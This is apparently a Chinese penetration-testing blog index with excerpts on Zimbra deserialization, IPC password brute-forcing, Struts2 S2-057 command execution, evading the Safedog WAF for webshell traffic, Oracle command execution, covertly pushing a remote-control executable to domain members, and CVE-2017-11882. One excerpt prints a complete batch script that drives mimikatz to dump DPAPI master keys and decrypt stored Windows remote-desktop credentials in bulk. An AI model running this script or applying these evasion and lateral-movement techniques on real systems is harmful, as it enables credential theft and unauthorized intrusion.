0%

环境搭建

我就不搭建了,其实我按照作者给的搭建过程也没搭建成功,我直接使用一个现成环境测试。

利用条件

需要获取到3个变量

zmImap:[accountId]:[folderNo]:[modseq]:[uidvalidity]

阅读本篇文章能了解到:Zimbra, 反序列化

阅读全文 »

0x01 前言

在内网环境中,掌握一些密码后,最基础,最有效获取服务器权限的方式即ipc暴破

关于ipc暴破,这类工具在网上见的不多。目前工作中见到的有直接开无数个cmd的伪bat,还有身边同事powershell写的ps1powershell是挺好用的,但有个关键问题是目标机器必须是win7及以上,遇到老机器当然是没法用了。

因此,bat无疑是首选,因其语言较底层,不够高级,写起来比较吃力

花了几天时间改了几个版本,解决了密码特殊字符,菜刀判断进程等各种问题,更新日志在update.txt,应用在自己的实战中。

阅读本篇文章能了解到:IPC, Bat

阅读全文 »

前言

Struts2又出漏洞了,上一波的045好用到不行,复现参考https://github.com/jas502n/St2-057

写这篇文章时,vulhub还没有057的漏洞环境

当Struts2的配置满足以下条件时:

  • alwaysSelectFullNamespace值为true
  • action元素未设置namespace属性,或使用了通配符

namespace将由用户从uri传入,并作为OGNL表达式计算,最终造成任意命令执行漏洞。

影响版本: 小于等于 Struts 2.3.34 与 Struts 2.5.16

看这个条件就知道没那么好利用

阅读本篇文章能了解到:vulhub, docker

阅读全文 »

前言

若服务器安装了安全狗,普通一句话安全狗肯定拦截,菜刀必然无法使用。

究其原因:菜刀请求关键字等被安全狗识别导致中断请求。

构造本地中转脚本,本地服务器发送请求,对菜刀请求关键字进行编码,服务端再对请求解码,这样安全狗无法识别也就无法拦截请求。

客户端

客户端即中转脚本transfer.php

客户端对菜刀请求参数进行编码操作,此处仅做简单编码验证bypass,编码顺序依次为

阅读全文 »

0x01 Oracle安装

CentOS 7 安装oracle10g,装了一天,特此记录

oracle9i,10G,11G,各版本下载资源

Centos6/7下静默安装oracle10g

0x02 命令执行

本文测试环境均为:

CentOS Linux release 7.2.1511 (Core)

Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bit Production

执行方式很多种,这边只研究Oracle10g,并且本地实测成功的

  • DBMS_EXPORT_EXTENSION()
  • dbms_xmlquery.newcontext()
  • DBMS_JAVA_TEST.FUNCALL()
阅读全文 »

前言

旧笔记本淘汰了,卖掉可惜,扔了更可惜,平时经常有破解wifi的需要,干脆把它做成双系统,win+linux两不误,由于我的华硕是UEFI+GPT,导致我双系统怎么都装不成功,由此开启了我崎岖的踩坑路。

UEFI

先恶补一波BIOS,MBR,UEFI,GPT

还没弄明白BIOS+MBR和UEFI+GPT?看这一篇讲解就足够了!

EFI、UEFI、MBR、GPT的区别

UEFI+GPT与BIOS+MBR各自有什么优缺点?

看了这些应该有了一定的认识,一般组合为:

  • UEFI + GPT
  • BIOS + MBR

我2012年买的华硕,已经默认是UEFI+GPT,当时还因为这个原因导致无法重装系统,现在装双系统,又碰到该问题,简直头皮发麻,不管怎么说,目的得先达到——安装双系统win+kali2.0。

步骤

阅读全文 »

0x01 背景

内网渗透中,当控制到域控时,当然是再好不过,但如何控制成员机器或个人机呢,域管理员账号登录?太敏感,动作大;psexec,wmi…?杀软报毒,不要不信,亲身经历;

想要直接推送个远控,神不知鬼不觉的搞定成员;

那么问题来了,如何推送个exe?

0x02 研究

方法1

查找大量相关资料,都没有现成的方法直接下发exe,然而吐司竟然也没有,最后,锁定了组策略开机脚本

域成员登录时,执行域控提前部署好的bat脚本,通过此脚本,IPC连接到域控,copy文件,在成员上执行。

阅读全文 »

前言

【奇技淫巧】破解远程终端凭据,获取服务器密码

想必大家都看了这篇文章吧,土司12月推送的,非常好的破解方式,内网中能起到相当大的作用,相信不少人已经去实践了一遍,过程之繁琐真是让我们这些人望而却步。

我可不想每拿到一台内网机,都要重复的去做这么复杂的操作,而且每一个凭据都要做一遍。

对批处理不熟,花了几天时间,写了个bat,一键批量获取。

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
@echo off
setlocal enabledelayedexpansion

echo.
echo [+] Start. Code by redn3ck.
echo.

set flag=0 REM 判断是否存在Credentials
for /f %%i in ('dir /a/s/b c:\Users\Administrator\AppData\Local\Microsoft\Credentials') do (
if exist %%i (
set file=%%i
set flag=1
echo !file!

for /f "delims=: tokens=1,2" %%i in ('mimikatz.exe "dpapi::cred /in:!file!" "exit" ^| findstr guidMasterKey') do set guidMasterKey=%%j
REM echo !guidMasterKey!

mimikatz "privilege::debug" "sekurlsa::dpapi" "exit" > MasterKey.txt

REM findstr /n 返回行号 example: 1: * GUID : {b619a08d-f4c3-408d-b733-bc89bd94ca0b}
for /f "delims=:" %%i in ('findstr /n "!guidMasterKey!" MasterKey.txt') do (
set /a lineNum=%%i+1
REM echo !lineNum!
call :next
)
)
)
:end
if !flag!==0 echo [-] No credentials :(
echo.
echo [+] End
exit /b

:next
for /f "skip=%lineNum% delims=" %%i in ('type MasterKey.txt') do (
set MasterKeyTemp=%%i
goto next2
)

:next2
set MasterKey=%MasterKeyTemp:~16%
REM echo %MasterKey%
mimikatz "dpapi::cred /in:%file% /masterkey:%MasterKey%" "exit" > pass.txt
findstr "TargetName UserName CredentialBlob" pass.txt
del MasterKey.txt

阅读全文 »

POC

https://github.com/embedi/CVE-2017-11882

如何使用,作者github里写的很清楚

附上自测gif

BTW

现在此漏洞被冠上全版本通杀的名号,作者也放出3个版本的视频,但我本地测试,却在2016下未成功

具体环境:win10 [10.0.16299.64] + 破解激活过的office2016